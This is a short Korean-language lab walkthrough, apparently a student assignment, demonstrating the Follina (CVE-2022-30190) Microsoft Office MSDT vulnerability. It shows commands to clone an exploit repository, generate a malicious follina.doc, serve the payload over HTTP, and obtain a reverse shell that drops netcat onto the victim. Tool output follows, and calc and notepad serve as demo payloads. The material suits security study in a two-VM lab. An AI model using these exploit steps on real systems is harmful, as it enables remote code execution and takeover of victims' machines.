
Follina(CVE-2022-30190)는 최근에 발견된 Microsoft Office 제로데이 취약점입니다. 해커가 원격 코드 실행(RCE) 공격에 악용할 수 있는 심각도가 높은 취약점입니다.
Amine TITROFINE | December 17, 2022
Follina(CVE-2022-30190)는 최근에 발견된 Microsoft Office 제로데이 취약점입니다. 공격자가 원격 코드 실행(RCE) 공격에 악용할 수 있는 높은 심각도의 취약점입니다. 이 취약점은 Word와 같은 호출 애플리케이션에서 URL 프로토콜을 사용하여 MSDT가 호출될 때 발생합니다. 이 취약점을 성공적으로 악용한 공격자는 호출 애플리케이션의 권한으로 임의 코드를 실행할 수 있습니다. 그런 다음 공격자는 사용자 권한이 허용하는 범위 내에서 프로그램을 설치하고, 데이터를 보거나 변경하거나 삭제하고, 새 계정을 만들 수 있습니다.
VM 2개:
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
follina.py 프로그램을 실행하면 ( follina.doc ) 파일이 나타나며, 이 파일에는 악성 스크립트가 포함되어 있습니다.
두 VM 간에 파일을 쉽게 공유하기 위해 Python http Server를 사용하겠습니다.
$ python3 –m http.server 8080
포트 9999에서 리버스 셸을 획득합니다. 참고: 이 방법은 netcat 바이너리를 피해자 시스템에 다운로드하여 C:\Windows\Tasks에 배치합니다. 이 바이너리를 정리하지 않으므로, 안티바이러스가 비활성화되어 있지 않으면 바이러스 백신 탐지가 트리거됩니다.
$ python3 follina.py -r 9999
calc.exe 실행:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
notepad.exe 실행:
$ python3 follina.py -c "notepad"